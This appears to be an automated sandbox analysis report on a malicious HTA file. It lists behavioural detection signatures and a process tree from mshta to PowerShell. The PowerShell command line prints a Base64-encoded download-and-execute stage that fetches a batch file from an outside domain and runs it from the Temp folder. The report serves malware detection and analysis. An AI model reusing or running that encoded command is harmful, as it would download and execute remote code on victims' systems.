Edit tour
Windows
Analysis Report
c1.hta
Overview
General Information
Detection
Score: | 64 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
AI detected suspicious sample
Encrypted powershell cmdline option found
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious MSHTA Child Process
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- mshta.exe (PID: 7036 cmdline:
mshta.exe "C:\Users\ user\Deskt op\c1.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) - powershell.exe (PID: 4456 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -NoProfile -EncodedC ommand WwB OAGUAdAAuA FMAZQByAHY AaQBjAGUAU ABvAGkAbgB 0AE0AYQBuA GEAZwBlAHI AXQA6ADoAU wBlAGMAdQB yAGkAdAB5A FAAcgBvAHQ AbwBjAG8Ab AAgAD0AIAB bAE4AZQB0A C4AUwBlAGM AdQByAGkAd AB5AFAAcgB vAHQAbwBjA G8AbABUAHk AcABlAF0AO gA6AFQAbAB zADEAMgA7A A0ACgBoAHQ AdABwAHMAO gAvAC8AYwB hAG4AZAB3A GYAYQByAG0 AcwBsAGwAY wAuAGMAbwB tAC8AYwAyA C4AYgBhAHQ APQAnAGgAd AB0AHAAcwA 6AC8ALwBjA GEAbgBkAHc AZgBhAHIAb QBzAGwAbAB jAC4AYwBvA G0ALwBjADI ALgBiAGEAd AAnADsADQA KAEMAOgBcA FUAcwBlAHI AcwBcAGEAc wBhAG8AbAB cAEEAcABwA EQAYQB0AGE AXABMAG8AY wBhAGwAXAB UAGUAbQBwA FwAYwAyAC4 AYgBhAHQAP QBDADoAXAB VAHMAZQByA HMAXABhAHM AYQBvAGwAX ABBAHAAcAB EAGEAdABhA FwATABvAGM AYQBsAFwAV ABlAG0AcAA gACsAIAAnA FwAYwAyAC4 AYgBhAHQAJ wA7AA0ACgB JAG4AdgBvA GsAZQAtAFc AZQBiAFIAZ QBxAHUAZQB zAHQAIAAtA FUAcgBpACA AaAB0AHQAc ABzADoALwA vAGMAYQBuA GQAdwBmAGE AcgBtAHMAb ABsAGMALgB jAG8AbQAvA GMAMgAuAGI AYQB0ACAAL QBPAHUAdAB GAGkAbABlA CAAQwA6AFw AVQBzAGUAc gBzAFwAYQB zAGEAbwBsA FwAQQBwAHA ARABhAHQAY QBcAEwAbwB jAGEAbABcA FQAZQBtAHA AXABjADIAL gBiAGEAdAA 7AA0ACgBTA HQAYQByAHQ ALQBQAHIAb wBjAGUAcwB zACAALQBGA GkAbABlAFA AYQB0AGgAI ABDADoAXAB VAHMAZQByA HMAXABhAHM AYQBvAGwAX ABBAHAAcAB EAGEAdABhA FwATABvAGM AYQBsAFwAV ABlAG0AcAB cAGMAMgAuA GIAYQB0ACA ALQBOAG8AT gBlAHcAVwB pAG4AZABvA HcA MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 3668 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
⊘No configs have been found
⊘No yara matches
System Summary |
---|
Source: | Author: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: |